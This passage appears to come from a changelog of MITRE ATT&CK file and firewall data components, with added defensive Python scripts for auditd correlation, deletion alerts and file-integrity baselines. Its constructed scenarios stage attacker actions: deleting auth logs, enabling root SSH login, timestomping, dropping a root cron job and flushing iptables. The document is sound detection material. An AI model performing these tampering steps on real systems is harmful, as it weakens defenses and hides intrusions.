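if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f["UtcTime"], f["ImageLoaded"], ", ".join(f["reasons"]))
```

The second event is the BYOVD case the text describes: the driver is validly signed, so a signature-only rule stays quiet, and only the hash match (plus the odd load path) surfaces it. Feed real records in by exporting the Sysmon operational log as XML, or by pointing the parser at each event's XML as your SIEM stores it.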
File: File Access
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
Old description: Opening a file, which makes the file contents available to the requestor (ex: Windows EID 4663)
New description: Refers to events where a file is opened or accessed, making its contents available to the requester. This includes reading, executing, or interacting with files by authorized or unauthorized entities. Examples include logging file access events (e.g., Windows Event ID 4663), monitoring file reads, and detecting unusual file access patterns. Examples:
- File Read Operations: A user opens a sensitive document (e.g., financial_report.xlsx) on a shared drive.
- File Execution: A script or executable file is accessed and executed (e.g., malware.exe is run from a temporary directory).
- Unauthorized File Access: An unauthorized user attempts to access a protected configuration file (e.g., `/etc/shadow` on Linux or `System32` files on Windows).
- File Access Patterns: Bulk access to multiple files in a short time (e.g., mass access to documents on a file server).
- File Access via Network: Files on a network share are accessed remotely (e.g., logs of SMB file access).
This data component can be collected through the following measures:
Windows
- Windows Event Logs: Event ID 4663: Captures file system auditing details, including who accessed the file, access type, and file name.
- Sysmon:
  - Event ID 11: Logs file creation (FileCreate); it does not record reads, but shows files written to disk before they are accessed or executed.
  - Event ID 1 (process creation): Can provide insight into files executed.
- PowerShell: Commands to monitor file access in real-time: `Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4663}`
Linux
- Auditd: Monitor file access events using audit rules: `auditctl -w /path/to/file -p rwxa -k file_access`
- View logs: `ausearch -k file_access`
- Inotify: Use inotify to track file access on Linux: `inotifywait -m /path/to/watch -e access`
macOS
- Unified Logs: Monitor file access using the macOS Unified Logging System.
- fs_usage: The `fs_usage` tool shows file system calls in real time, including opens: `fs_usage | grep open`
Network Devices
- SMB/CIFS Logs: Monitor file access over network shares using logs from SMB or CIFS protocol.
- NAS Logs: Collect logs from network-attached storage systems for file access events.
SIEM Integration
- Collect file access logs from all platforms (Windows, Linux, macOS) and centralize in a SIEM for correlation and analysis.
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:10:07.996Z |
description | Opening a file, which makes the file contents available to the requestor (ex: Windows EID 4663) | Refers to events where a file is opened or accessed, making its contents available to the requester. This includes reading, executing, or interacting with files by authorized or unauthorized entities. Examples include logging file access events (e.g., Windows Event ID 4663), monitoring file reads, and detecting unusual file access patterns. Examples:
- File Read Operations: A user opens a sensitive document (e.g., financial_report.xlsx) on a shared drive.
- File Execution: A script or executable file is accessed and executed (e.g., malware.exe is run from a temporary directory).
- Unauthorized File Access: An unauthorized user attempts to access a protected configuration file (e.g., `/etc/shadow` on Linux or `System32` files on Windows).
- File Access Patterns: Bulk access to multiple files in a short time (e.g., mass access to documents on a file server).
- File Access via Network: Files on a network share are accessed remotely (e.g., logs of SMB file access).
This data component can be collected through the following measures:
Windows
- Windows Event Logs: Event ID 4663: Captures file system auditing details, including who accessed the file, access type, and file name.
- Sysmon:
- Event ID 11: Logs file creation (FileCreate); it does not record reads, but shows files written to disk before they are accessed or executed.
- Event ID 1 (process creation): Can provide insight into files executed.
- PowerShell: Commands to monitor file access in real-time: `Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4663}`
Linux
- Auditd: Monitor file access events using audit rules: `auditctl -w /path/to/file -p rwxa -k file_access`
- View logs: `ausearch -k file_access`
- Inotify: Use inotify to track file access on Linux: `inotifywait -m /path/to/watch -e access`
macOS
- Unified Logs: Monitor file access using the macOS Unified Logging System.
- fs_usage: The `fs_usage` tool shows file system calls in real time, including opens: `fs_usage | grep open`
Network Devices
- SMB/CIFS Logs: Monitor file access over network shares using logs from SMB or CIFS protocol.
- NAS Logs: Collect logs from network-attached storage systems for file access events.
SIEM Integration
- Collect file access logs from all platforms (Windows, Linux, macOS) and centralize in a SIEM for correlation and analysis. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
File: File Creation
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
Old description: Initial construction of a new file (ex: Sysmon EID 11)
New description: A new file is created on a system or network storage. This action often signifies an operation such as saving a document, writing data, or deploying a file. Logging these events helps identify legitimate or potentially malicious file creation activities. Examples include logging file creation events (e.g., Sysmon Event ID 11 or Linux auditd logs).
This data component can be collected through the following measures:
Windows
- Sysmon: Event ID 11: Logs file creation events, capturing details like the file path, hash, and creation time.
- Windows Event Log: Enable "Object Access" auditing in Group Policy to track file creation under Event ID 4663.
- PowerShell: Real-time monitoring of file creation: `Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4663}`
Linux
- Auditd: Use audit rules to monitor file creation: `auditctl -w /path/to/directory -p w -k file_creation`
- View logs: `ausearch -k file_creation`
- Inotify: Monitor file creation with inotifywait: `inotifywait -m /path/to/watch -e create`
macOS
- Unified Logs: Use the macOS Unified Logging System to capture file creation events.
- fs_usage: Watch file creation in real time with `fs_usage | grep create`
Network Devices
- NAS Logs: Monitor file creation events on network-attached storage devices.
- SMB Logs: Collect logs of file creation activities over SMB/CIFS protocols.
SIEM Integration
- Forward logs from all platforms (Windows, Linux, macOS) to a SIEM for central analysis and alerting.
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:10:18.072Z |
description | Initial construction of a new file (ex: Sysmon EID 11) | A new file is created on a system or network storage. This action often signifies an operation such as saving a document, writing data, or deploying a file. Logging these events helps identify legitimate or potentially malicious file creation activities. Examples include logging file creation events (e.g., Sysmon Event ID 11 or Linux auditd logs).
This data component can be collected through the following measures:
Windows
- Sysmon: Event ID 11: Logs file creation events, capturing details like the file path, hash, and creation time.
- Windows Event Log: Enable "Object Access" auditing in Group Policy to track file creation under Event ID 4663.
- PowerShell: Real-time monitoring of file creation:`Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4663}`
Linux
- Auditd: Use audit rules to monitor file creation: `auditctl -w /path/to/directory -p w -k file_creation`
- View logs: `ausearch -k file_creation`
- Inotify: Monitor file creation with inotifywait: `inotifywait -m /path/to/watch -e create`
macOS
- Unified Logs: Use the macOS Unified Logging System to capture file creation events.
- fs_usage: Watch file creation in real time with `fs_usage | grep create`
Network Devices
- NAS Logs: Monitor file creation events on network-attached storage devices.
- SMB Logs: Collect logs of file creation activities over SMB/CIFS protocols.
SIEM Integration
- Forward logs from all platforms (Windows, Linux, macOS) to a SIEM for central analysis and alerting. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
File: File Deletion
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
Old description: Removal of a file (ex: Sysmon EID 23, macOS ESF EID ES_EVENT_TYPE_AUTH_UNLINK, or Linux commands auditd unlink, rename, rmdir, unlinked, or renameat rules)
New description: Refers to events where files are removed from a system or storage device. These events can indicate legitimate housekeeping activities or malicious actions such as attackers attempting to cover their tracks. Monitoring file deletions helps organizations identify unauthorized or suspicious activities.
This data component can be collected through the following measures:
Windows
- Sysmon: Event ID 23: Logs file deletion events, including details such as file paths and responsible processes.
- Windows Event Log: Enable "Object Access" auditing to monitor file deletions; Security Event ID 4660 (An object was deleted) records the deletion itself, and the preceding Event ID 4663 carries the DELETE access request together with the object name.
- PowerShell: `Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4663} | Where-Object {$_.Message -like '*DELETE*'}`
Linux
- Auditd: Use audit rules to capture file deletion events; modern coreutils `rm` calls `unlinkat`, so include the *at variants: `auditctl -a always,exit -F arch=b64 -S unlink -S unlinkat -S rename -S renameat -S rmdir -k file_deletion`
- Query logs: `ausearch -k file_deletion`
- Inotify: Use inotifywait to monitor file deletions: `inotifywait -m /path/to/watch -e delete`
macOS
- Endpoint Security Framework (ESF): Monitor events like ES_EVENT_TYPE_AUTH_UNLINK to capture file deletion activities.
- fs_usage: Track file deletion activities in real time: `fs_usage | grep unlink`
SIEM Integration
- Forward file deletion logs to a SIEM for centralized monitoring and correlation with other events.
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-03-30T14:26:51.805Z | 2025-04-18T15:10:21.434Z |
description | Removal of a file (ex: Sysmon EID 23, macOS ESF EID ES_EVENT_TYPE_AUTH_UNLINK, or Linux commands auditd unlink, rename, rmdir, unlinked, or renameat rules) | Refers to events where files are removed from a system or storage device. These events can indicate legitimate housekeeping activities or malicious actions such as attackers attempting to cover their tracks. Monitoring file deletions helps organizations identify unauthorized or suspicious activities.
This data component can be collected through the following measures:
Windows
- Sysmon: Event ID 23: Logs file deletion events, including details such as file paths and responsible processes.
- Windows Event Log: Enable "Object Access" auditing to monitor file deletions; Security Event ID 4660 (An object was deleted) records the deletion itself, and the preceding Event ID 4663 carries the DELETE access request together with the object name.
- PowerShell: `Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4663} | Where-Object {$_.Message -like '*DELETE*'}`
Linux
- Auditd: Use audit rules to capture file deletion events; modern coreutils `rm` calls `unlinkat`, so include the *at variants: `auditctl -a always,exit -F arch=b64 -S unlink -S unlinkat -S rename -S renameat -S rmdir -k file_deletion`
- Query logs: `ausearch -k file_deletion`
- Inotify: Use inotifywait to monitor file deletions: `inotifywait -m /path/to/watch -e delete`
macOS
- Endpoint Security Framework (ESF): Monitor events like ES_EVENT_TYPE_AUTH_UNLINK to capture file deletion activities.
- fs_usage: Track file deletion activities in real time: `fs_usage | grep unlink`
SIEM Integration
- Forward file deletion logs to a SIEM for centralized monitoring and correlation with other events.
|
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
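The File Access, File Creation and File Deletion components above all end with the same Linux recipe: an `auditctl` rule tagged with `-k`, then `ausearch -k`. What `ausearch` hides is that one file operation produces several `audit.log` records (SYSCALL, CWD, one PATH per path item) tied together only by the serial in `msg=audit(ts:serial)`, and that the PATH record's `nametype` (NORMAL, CREATE, DELETE) is what tells the three components apart. The following added example (not part of the ATT&CK changelog or MITRE's data) correlates constructed raw audit records into per-syscall events and then runs two deletion detections over them: deletions under a sensitive prefix and a burst of deletions by one process. The log lines, PIDs, paths and thresholds are constructed for illustration; the syscall numbers are the x86_64 values auditd reports for `arch=c000003e`.

```python
"""Correlate raw auditd records into file access / creation / deletion events and flag deletions.

Added example; not MITRE's code. The audit.log excerpt is constructed (fields trimmed to
those the code needs); syscall numbers are the x86_64 values.
"""
import re
from collections import defaultdict
from typing import Dict, List, Tuple

SYSCALL_NAMES = {87: "unlink", 263: "unlinkat", 84: "rmdir", 82: "rename", 264: "renameat",
                 316: "renameat2", 2: "open", 257: "openat"}
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
MSG_RE = re.compile(r"msg=audit\((\d+)\.(\d+):(\d+)\)")

# Constructed excerpt: one read (file_access), one create (file_creation), a three-file
# `rm` burst by pid 2318 and a root shell unlinking /var/log/auth.log (file_deletion).
SAMPLE_AUDIT_LOG = """\
type=SYSCALL msg=audit(1713453000.100:5001): arch=c000003e syscall=257 success=yes exit=3 items=1 pid=2310 auid=1000 uid=1000 comm="cat" exe="/usr/bin/cat" key="file_access"
type=PATH msg=audit(1713453000.100:5001): item=0 name="/home/alice/docs/financial_report.xlsx" inode=142 dev=08:01 mode=0100644 ouid=1000 ogid=1000 nametype=NORMAL
type=SYSCALL msg=audit(1713453005.200:5002): arch=c000003e syscall=257 success=yes exit=3 items=2 pid=2315 auid=1000 uid=1000 comm="bash" exe="/usr/bin/bash" key="file_creation"
type=PATH msg=audit(1713453005.200:5002): item=0 name="/home/alice/docs/" inode=131 dev=08:01 mode=040755 ouid=1000 ogid=1000 nametype=PARENT
type=PATH msg=audit(1713453005.200:5002): item=1 name="/home/alice/docs/notes.txt" inode=150 dev=08:01 mode=0100644 ouid=1000 ogid=1000 nametype=CREATE
type=SYSCALL msg=audit(1713453021.434:5003): arch=c000003e syscall=263 success=yes exit=0 items=2 pid=2318 auid=1000 uid=1000 comm="rm" exe="/usr/bin/rm" key="file_deletion"
type=PATH msg=audit(1713453021.434:5003): item=0 name="/home/alice/docs/" inode=131 dev=08:01 mode=040755 ouid=1000 ogid=1000 nametype=PARENT
type=PATH msg=audit(1713453021.434:5003): item=1 name="/home/alice/docs/report.xlsx" inode=142 dev=08:01 mode=0100644 ouid=1000 ogid=1000 nametype=DELETE
type=SYSCALL msg=audit(1713453021.501:5004): arch=c000003e syscall=263 success=yes exit=0 items=2 pid=2318 auid=1000 uid=1000 comm="rm" exe="/usr/bin/rm" key="file_deletion"
type=PATH msg=audit(1713453021.501:5004): item=1 name="/home/alice/docs/notes.txt" inode=150 dev=08:01 mode=0100644 ouid=1000 ogid=1000 nametype=DELETE
type=SYSCALL msg=audit(1713453022.010:5005): arch=c000003e syscall=263 success=yes exit=0 items=2 pid=2318 auid=1000 uid=1000 comm="rm" exe="/usr/bin/rm" key="file_deletion"
type=PATH msg=audit(1713453022.010:5005): item=1 name="/home/alice/docs/budget.ods" inode=151 dev=08:01 mode=0100644 ouid=1000 ogid=1000 nametype=DELETE
type=SYSCALL msg=audit(1713453090.000:5006): arch=c000003e syscall=87 success=yes exit=0 items=2 pid=2400 auid=0 uid=0 comm="sh" exe="/usr/bin/dash" key="file_deletion"
type=PATH msg=audit(1713453090.000:5006): item=1 name="/var/log/auth.log" inode=77 dev=08:01 mode=0100640 ouid=0 ogid=4 nametype=DELETE
"""


def parse_record(line: str) -> Dict[str, object]:
    """Turn one audit.log line into a dict of fields plus numeric 'ts' and the event 'serial'."""
    rec: Dict[str, object] = {k: v.strip('"') for k, v in KV_RE.findall(line)}
    m = MSG_RE.search(line)
    rec["ts"], rec["serial"] = float(f"{m.group(1)}.{m.group(2)}"), m.group(3)
    return rec


def correlate(log_text: str) -> List[Dict[str, object]]:
    """Join records that share a serial into one event per syscall, sorted by time."""
    groups: Dict[str, List[Dict[str, object]]] = defaultdict(list)
    for line in log_text.splitlines():
        if line.strip():
            rec = parse_record(line)
            groups[str(rec["serial"])].append(rec)
    events = []
    for serial, recs in groups.items():
        sc = next((r for r in recs if r["type"] == "SYSCALL"), None)
        if sc is None:          # PATH/CWD without a SYSCALL record: nothing to attribute
            continue
        paths = [r for r in recs if r["type"] == "PATH"]
        events.append({
            "serial": serial, "ts": sc["ts"], "pid": sc["pid"], "auid": sc["auid"],
            "comm": sc["comm"], "exe": sc["exe"], "key": sc.get("key", ""),
            "syscall": SYSCALL_NAMES.get(int(sc["syscall"]), sc["syscall"]),
            "success": sc["success"] == "yes",
            "deleted": [p["name"] for p in paths if p.get("nametype") == "DELETE"],
            "created": [p["name"] for p in paths if p.get("nametype") == "CREATE"],
            "accessed": [p["name"] for p in paths if p.get("nametype") == "NORMAL"],
        })
    return sorted(events, key=lambda e: e["ts"])


def flag_deletions(events: List[Dict[str, object]], bulk_threshold: int = 3, window_s: float = 10.0,
                   sensitive_prefixes: Tuple[str, ...] = ("/var/log/",)) -> List[tuple]:
    """Flag successful deletions under sensitive paths and bursts of deletions by one pid."""
    findings = []
    by_pid: Dict[str, List[Tuple[float, str]]] = defaultdict(list)
    for e in events:
        if not (e["success"] and e["deleted"]):
            continue
        for name in e["deleted"]:
            if name.startswith(sensitive_prefixes):
                findings.append(("sensitive_delete", e["pid"], name))
            by_pid[e["pid"]].append((e["ts"], name))
    for pid, items in by_pid.items():
        items.sort()
        for i in range(len(items)):
            n = sum(1 for ts, _ in items[i:] if ts - items[i][0] <= window_s)
            if n >= bulk_threshold:
                findings.append(("bulk_delete", pid, n))
                break
    return findings


if __name__ == "__main__":
    evs = correlate(SAMPLE_AUDIT_LOG)
    for e in evs:
        print(e["ts"], e["key"], e["comm"], e["syscall"], e["accessed"] + e["created"] + e["deleted"])
    print(flag_deletions(evs))
```

On a real host, feed it `/var/log/audit/audit.log` (or `ausearch --raw`). Note that the three-file `rm` burst would be invisible to a rule that only audits `unlink`, since every record in it is `unlinkat` (syscall 263); that is why the rule in the text should list both.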
File: File Metadata
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
Old description: Contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc.
New description: Contextual information about a file, including attributes such as the file's name, size, type, content (e.g., signatures, headers, media), user/owner, permissions, timestamps, and other related properties. File metadata provides insights into a file's characteristics and can be used to detect malicious activity, unauthorized modifications, or other anomalies. Examples:
- File Ownership and Permissions: Checking the owner and permissions of a critical configuration file like /etc/passwd on Linux or C:\Windows\System32\config\SAM on Windows.
- Timestamps: Analyzing the creation, modification, and access timestamps of a file.
- File Content and Signatures: Extracting the headers of an executable file to verify its signature or detect packing/obfuscation.
- File Attributes: Analyzing attributes like hidden, system, or read-only flags in Windows.
- File Hashes: Generating MD5, SHA-1, or SHA-256 hashes of files to compare against threat intelligence feeds.
- File Location: Monitoring files located in unusual directories or paths, such as temporary or user folders.
This data component can be collected through the following measures:
Windows
- Sysinternals Tools: Use `AccessEnum` or `PsFile` to retrieve metadata about file access and permissions.
- Windows Event Logs: Enable object access auditing and monitor events like 4663 (Object Access) and 5140 (A network share object was accessed).
- PowerShell: Use Get-Item or Get-ChildItem cmdlets: `Get-ChildItem -Path "C:\Path\To\Directory" -Recurse | Select-Object Name, Length, LastWriteTime, Attributes`
Linux
- File System Commands: Use `ls -l` or `stat` to retrieve file metadata: `stat /path/to/file`
- Auditd: Configure audit rules to log metadata access: `auditctl -w /path/to/file -p wa -k file_metadata`
- Filesystem Integrity Tools: Tools like Tripwire or AIDE (Advanced Intrusion Detection Environment) can monitor file metadata changes.
macOS
- FSEvents: Use FSEvents to track file metadata changes.
- Endpoint Security Framework (ESF): Capture metadata-related events via ESF APIs.
- Command-Line Tools: Use `ls -l` or `xattr` for file attributes: `ls -l@ /path/to/file`
SIEM Integration
- Forward file metadata logs from endpoint or network devices to a SIEM for centralized analysis.
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-11-01T21:18:51.941Z | 2025-04-18T15:10:14.725Z |
description | Contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc. | Contextual information about a file, including attributes such as the file's name, size, type, content (e.g., signatures, headers, media), user/owner, permissions, timestamps, and other related properties. File metadata provides insights into a file's characteristics and can be used to detect malicious activity, unauthorized modifications, or other anomalies. Examples:
- File Ownership and Permissions: Checking the owner and permissions of a critical configuration file like /etc/passwd on Linux or C:\Windows\System32\config\SAM on Windows.
- Timestamps: Analyzing the creation, modification, and access timestamps of a file.
- File Content and Signatures: Extracting the headers of an executable file to verify its signature or detect packing/obfuscation.
- File Attributes: Analyzing attributes like hidden, system, or read-only flags in Windows.
- File Hashes: Generating MD5, SHA-1, or SHA-256 hashes of files to compare against threat intelligence feeds.
- File Location: Monitoring files located in unusual directories or paths, such as temporary or user folders.
This data component can be collected through the following measures:
Windows
- Sysinternals Tools: Use `AccessEnum` or `PSFile` to retrieve metadata about file access and permissions.
- Windows Event Logs: Enable object access auditing and monitor events like 4663 (Object Access) and 5140 (A network share object was accessed).
- PowerShell: Use Get-Item or Get-ChildItem cmdlets: `Get-ChildItem -Path "C:\Path\To\Directory" -Recurse | Select-Object Name, Length, LastWriteTime, Attributes`
Linux
- File System Commands: Use `ls -l` or stat to retrieve file metadata: `stat /path/to/file`
- Auditd: Configure audit rules to log metadata access: `auditctl -w /path/to/file -p wa -k file_metadata`
- Filesystem Integrity Tools: Tools like tripwire or AIDE (Advanced Intrusion Detection Environment) can monitor file metadata changes.
macOS
- FSEvents: Use FSEvents to track file metadata changes.
- Endpoint Security Framework (ESF): Capture metadata-related events via ESF APIs.
- Command-Line Tools: Use ls -l or xattr for file attributes: `ls -l@ /path/to/file`
SIEM Integration
- Forward file metadata logs from endpoint or network devices to a SIEM for centralized analysis. |
x_mitre_version | 1.0 | 1.1 |
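The File Metadata component lists the properties worth recording (owner, permissions, timestamps, hashes) and names Tripwire and AIDE as the tools that turn them into a detection. The following added example (not part of the ATT&CK changelog or MITRE's data) shows the core of such a tool: snapshot the metadata of every entry under a directory, then diff a later snapshot against it, distinguishing a content change (hash and size), a permission widening (mode only), a timestomp (mtime only, hash unchanged), a dropped file and a removed file. The scenario runs in a temporary directory with constructed file names and contents; the `demo()` function exists only to stage that scenario.

```python
"""Baseline file metadata (hash, mode, owner, size, mtime) and report what changed, AIDE-style.

Added example; not MITRE's or AIDE's code. demo() stages a constructed scenario in a temp dir.
"""
import hashlib
import os
import stat
import tempfile
from typing import Dict


def file_record(path: str) -> Dict[str, object]:
    """Metadata for one entry; lstat so a symlink is recorded as itself, not its target."""
    st = os.lstat(path)
    rec: Dict[str, object] = {
        "type": stat.S_IFMT(st.st_mode), "mode": stat.S_IMODE(st.st_mode),
        "uid": st.st_uid, "gid": st.st_gid, "size": st.st_size, "mtime_ns": st.st_mtime_ns,
    }
    if stat.S_ISREG(st.st_mode):
        h = hashlib.sha256()
        with open(path, "rb") as f:
            for chunk in iter(lambda: f.read(65536), b""):
                h.update(chunk)
        rec["sha256"] = h.hexdigest()
    return rec


def baseline(root: str) -> Dict[str, Dict[str, object]]:
    """Walk root and record every file and directory, keyed by path relative to root."""
    db = {}
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            db[os.path.relpath(full, root)] = file_record(full)
    return db


def compare(before: Dict[str, Dict[str, object]], after: Dict[str, Dict[str, object]]) -> Dict[str, str]:
    """Return {relpath: 'added' | 'removed' | 'changed:<fields>'} for every difference."""
    changes = {}
    for rel in sorted(set(before) | set(after)):
        if rel not in before:
            changes[rel] = "added"
        elif rel not in after:
            changes[rel] = "removed"
        else:
            diff = sorted(k for k in set(before[rel]) | set(after[rel])
                          if before[rel].get(k) != after[rel].get(k))
            if diff:
                changes[rel] = "changed:" + ",".join(diff)
    return changes


def demo() -> Dict[str, str]:
    """Constructed scenario: content edit, permission widening, timestomp, dropped and removed files."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "etc"))
        seed = {"etc/sshd_config": b"PermitRootLogin no\n", "etc/hosts": b"127.0.0.1 localhost\n",
                "etc/motd": b"hi\n", "etc/old.conf": b"legacy\n"}
        for rel, content in seed.items():
            with open(os.path.join(root, rel), "wb") as f:
                f.write(content)
        os.chmod(os.path.join(root, "etc/motd"), 0o644)
        base = baseline(root)

        with open(os.path.join(root, "etc/sshd_config"), "ab") as f:   # 1. content tampering
            f.write(b"PermitRootLogin yes\n")
        os.chmod(os.path.join(root, "etc/motd"), 0o777)                   # 2. 644 -> 777
        epoch_2001 = 1_000_000_000 * 10**9                                # 3. timestomp, content untouched
        os.utime(os.path.join(root, "etc/hosts"), ns=(epoch_2001, epoch_2001))
        with open(os.path.join(root, "etc/cron.d_evil"), "wb") as f:      # 4. dropped file
            f.write(b"* * * * * root /tmp/x\n")
        os.remove(os.path.join(root, "etc/old.conf"))                     # 5. removed file

        return compare(base, baseline(root))


if __name__ == "__main__":
    for rel, what in demo().items():
        print(f"{what:24} {rel}")
```

The interesting row is `etc/hosts`: only `mtime_ns` differs while the SHA-256 is unchanged, which is the signature of a timestomp rather than an edit, and `etc/motd` shows `mode` alone, which a hash-only integrity check would never report. For production use, store the baseline off-host (or sign it), since an adversary who can modify the files can also modify a baseline kept beside them.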
File: File Modification
Current version: 1.1
Version changed from: 1.0 → 1.1
Old description: Changes made to a file, or its access permissions and attributes, typically to alter the contents of the targeted file (ex: Windows EID 4670 or Sysmon EID 2)
New description: rewritten and expanded with examples and collection measures; the full text is in the description row under Details.
Details
dictionary_item_added
STIX Field | Old value | New Value
---|---|---
revoked | | False
x_mitre_deprecated | | False
x_mitre_domains | | ['ics-attack', 'enterprise-attack']
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:10:11.410Z |
description | Changes made to a file, or its access permissions and attributes, typically to alter the contents of the targeted file (ex: Windows EID 4670 or Sysmon EID 2) | Changes made to a file, including updates to its contents, metadata, access permissions, or attributes. These modifications may indicate legitimate activity (e.g., software updates) or unauthorized changes (e.g., tampering, ransomware, or adversarial modifications). Examples:
- Content Modifications: Changes to the content of a configuration file, such as modifying `/etc/ssh/sshd_config` on Linux or `C:\Windows\System32\drivers\etc\hosts` on Windows.
- Permission Changes: Altering file permissions to allow broader access, such as changing a file's mode from `644` to `777` on Linux or modifying NTFS permissions on Windows.
- Attribute Modifications: Changing a file's attributes to hidden, read-only, or system on Windows.
- Timestamp Manipulation: Adjusting a file's creation or modification timestamp using tools like `touch -t` on Linux or timestomping tools on Windows.
- Software or System File Changes: Modifying system files such as `boot.ini`, kernel modules, or application binaries.
This data component can be collected through the following measures:
Windows
- Event Logs: Enable file system auditing (Audit File System under Object Access) and monitor Security Event ID 4663 (An attempt was made to access an object, with a write access mask) and 4670 (Permissions on an object were changed), plus Sysmon Event ID 2 (A process changed a file creation time).
- PowerShell: Use Get-Item, Get-ItemProperty or Get-Acl to inspect file properties and ACLs: `Get-Item -Path "C:\path\to\file" | Select-Object Name, Attributes, LastWriteTime`
Linux
- File System Monitoring: Use auditd with a watch rule that logs writes and attribute changes: `auditctl -w /path/to/file -p wa -k file_modification`
- Inotify: Use inotifywait to watch for real-time changes to files or directories: `inotifywait -m /path/to/file`
macOS
- Endpoint Security Framework (ESF): Monitor file modification events using ESF APIs.
- Audit Framework: Configure audit rules to track file changes.
- Command-Line Tools: Use fs_usage to monitor file system activity; it filters by process rather than by path, so narrow to a path with grep: `fs_usage -w -f filesys | grep /path/to/file`
SIEM Tools
- Collect logs from endpoint agents (e.g., Sysmon, Auditd) and file servers to centralize file modification event data. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
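The new description lists three kinds of modification (content, permission bits, timestamps) that a single metadata snapshot will not tell apart. The following is an added example, not MITRE's code or anything from the ATT&CK data: a minimal baseline-and-diff check that reproduces those three modifications in a temporary directory it creates itself and classifies each one. The file name `sshd_config`, the finding labels and the use of ctime as the timestomping tell are this example's own choices.

```python
"""File-integrity baseline and diff for the File Modification data
component. Added example, not MITRE's code. The target file, its
directory and the finding labels are constructed for the demo."""
import hashlib
import os
import stat
import tempfile
import time


def snapshot(path):
    """Capture content hash, permission bits, size, mtime and ctime.
    ctime is maintained by the kernel and cannot be set with touch/utime,
    so an mtime that moves backwards while ctime advances is a timestomp."""
    st = os.lstat(path)
    with open(path, "rb") as fh:
        digest = hashlib.sha256(fh.read()).hexdigest()
    return {
        "sha256": digest,
        "mode": stat.S_IMODE(st.st_mode),
        "size": st.st_size,
        "mtime": st.st_mtime,
        "ctime": st.st_ctime,
    }


def diff(before, after):
    """Classify what changed between two snapshots of the same file."""
    findings = []
    if before["sha256"] != after["sha256"]:
        findings.append("content_modified")
    if before["mode"] != after["mode"]:
        findings.append("permissions_changed:%o->%o" % (before["mode"], after["mode"]))
    if after["mtime"] < before["mtime"]:
        # mtime went backwards: `touch -t` / timestomping
        findings.append("timestamp_manipulated")
    elif after["sha256"] == before["sha256"] and after["mtime"] != before["mtime"]:
        findings.append("mtime_changed_without_content_change")
    return findings


def demo():
    """Reproduce the three modifications from the description and
    return what the diff detects."""
    workdir = tempfile.mkdtemp()
    target = os.path.join(workdir, "sshd_config")   # constructed sample file
    with open(target, "w") as fh:
        fh.write("PermitRootLogin no\n")
    os.chmod(target, 0o644)
    before = snapshot(target)
    time.sleep(0.01)
    with open(target, "a") as fh:                   # 1. content modification
        fh.write("PermitRootLogin yes\n")
    os.chmod(target, 0o777)                         # 2. mode 644 -> 777
    backdated = time.time() - 365 * 86400           # 3. what `touch -t` does
    os.utime(target, (backdated, backdated))
    after = snapshot(target)
    return diff(before, after)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

In production the baseline would be stored away from the monitored host and compared against a fresh `snapshot()` on a schedule; the Windows equivalents of these fields come from `Get-Item` (Attributes, LastWriteTime) and the 4663/4670 events listed above.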
Firewall: Firewall Disable
Current version: 1.1
Version changed from: 1.0 → 1.1
Old description: Deactivation or stoppage of a cloud service (ex: Write/Delete entries within Azure Firewall Activity Logs)
New description: rewritten to cover host and cloud firewalls, with examples and collection measures; the full text is in the description row under Details.
Details
dictionary_item_added
STIX Field | Old value | New Value
---|---|---
revoked | | False
x_mitre_deprecated | | False
x_mitre_domains | | ['enterprise-attack']
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:16:59.931Z |
description | Deactivation or stoppage of a cloud service (ex: Write/Delete entries within Azure Firewall Activity Logs) | The deactivation, misconfiguration, or complete stoppage of firewall services, either on a host or in a cloud control plane. Such activity may involve turning off firewalls, modifying rules to disable protection, or deleting firewall-related configurations and activity logs. Examples:
- Disabling Host-Based Firewalls: Stopping the Windows Defender Firewall service or using `iptables -F` to flush all rules on a Linux system.
- Cloud Firewall Modification or Deactivation: Modifying or deleting security group rules in AWS or disabling a network firewall in Azure.
- Activity Log Deletion: Writing or deleting entries in Azure Firewall Activity Logs to hide unauthorized firewall changes.
